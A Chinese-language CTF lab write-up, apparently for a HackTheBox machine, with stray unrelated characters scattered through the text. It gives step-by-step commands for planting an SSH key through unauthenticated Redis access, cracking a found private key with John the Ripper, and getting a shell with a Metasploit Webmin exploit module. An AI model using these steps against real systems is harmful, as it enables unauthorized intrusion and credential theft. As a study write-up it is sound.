看了ms08067實驗室的writeup,得到了思路魔种,再次重拾信心做一遍析二。
過程:
nmap全端口掃描,如圖:
之前自己做的時候沒有掃出6379的redis服務(wù)节预,所以做一半都走不通沒有了思路叶摄。這次直接對redis服務(wù)進(jìn)行攻擊滲透,經(jīng)過測試msf中的exploit不能成功進(jìn)入redis安拟。
這里要說一下蛤吓,MS08067實驗室的writeup使用的某個payload的python腳本直接進(jìn)去。我親測了一下總是失敗的糠赦,后經(jīng)研究發(fā)現(xiàn)writeup可能有的地方?jīng)]有提及或者可能有第三方的因素導(dǎo)致實驗室成員使用腳本成功登入会傲,
這里我是手工根據(jù)redis未授權(quán)訪問進(jìn)入
首先本機(jī)中要安裝redis-cli锅棕,這是連接redis的手段。我們在/root/.ssh下輸入ssh-keygen-t rsa淌山,生成ssh密鑰哲戚,文件夾內(nèi)會生成一個私鑰和公鑰,接著輸入(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt艾岂,將公鑰導(dǎo)入到key.txt中顺少,如圖:
輸入cat /root/.ssh/key.txt | redis-cli-h 10.10.10.160 -x set “xxx”,將公鑰key.txt導(dǎo)入到目標(biāo)中王浴,輸入redis-cli -h10.10.10.160進(jìn)入目標(biāo)redis環(huán)境脆炎,這里需要先利用 config get dir查看目標(biāo)中的目錄,如圖:
接著config set dir /var/lib/redis/.ssh, config set dbfilename authorized_keys氓辣,然后save即可秒裕。如圖:
然后通過ssh連入,這里要注意钞啸,咱們剛才看到的路徑是/var/lib/redis/.ssh几蜻,很明顯ssh連接的時候要使用redis作為用戶登陸。如圖:
返回到跟目錄体斩,輸入locate user.txt梭稚,定位user的flag,得到位置絮吵,但是權(quán)限不能訪問弧烤,如圖:
這里也參考了一下writeup,在/opt下找了一個私鑰的備份文件蹬敲,如圖:
弄到本地然后利用john界面暇昂,這里第一次接觸john,學(xué)了一下是非常強(qiáng)大的密碼破解工具伴嗡。先利用john的ssh2john.py將私鑰文件轉(zhuǎn)換成john可解析的文件急波。輸入python /usr/share/john/ssh2john.py sshkey > dekey,接著輸入john dekey破解即可,如圖:
這里偷了個懶瘪校,直接根據(jù)實驗室的writeup得出的密碼:computer2008進(jìn)入到了Matt澄暮。直接獲得user.txt,提交即可渣淤。這里想根據(jù)sudo的提權(quán)漏洞查看是否能有其他收獲赏寇,但是沒有提權(quán)成功吉嫩。
這里想到了之前走不通的webmin价认,可以利用很多payload,現(xiàn)在也有了用戶名和密碼自娩,看看能否登錄用踩。如圖:
能夠登錄渠退,直接msf使用exploit,利用exploit/linux/http/webmin_packageup_rce脐彩。查看options碎乃,如圖:
配置好執(zhí)行,成功獲得shell并進(jìn)入惠奸,如圖:
查找root.txt是否存在梅誓,存在并且查看flag即可。
參考資料:
https://blog.csdn.net/fly_hps/article/details/80937837? :::?? redis未授權(quán)利用
https://blog.csdn.net/qq_40490088/article/details/97812715? :::??john破解ssh密鑰
思考:
在得到hints之前佛南,我nmap是沒有掃出redis服務(wù)的梗掰,在ssh、webmin甚至是http上投入了大量的時間和exploits都沒有進(jìn)展嗅回,讓我接近崩潰及穗。在得到redis服務(wù)的hint后重拾思路,通過未授權(quán)訪問完成一系列滲透绵载。
這個環(huán)境其實說難不難埂陆,如果不細(xì)心或者經(jīng)驗較少可能就會像我一樣,卡住原地崩潰娃豹。但是一旦知道了立足點就迎刃而解了焚虱。
這次的靶機(jī)我認(rèn)為主要需要了解redis服務(wù)的操作以及機(jī)制吧。到現(xiàn)在我還有很多redis內(nèi)容還需要鞏固懂版,還有就是john ripper這個工具著摔,需要花點時間去再研究。Webmin的漏洞還是需要掌握的定续,畢竟從EDB上伸手拿來也不是很好谍咆,對自己也沒長進(jìn)。
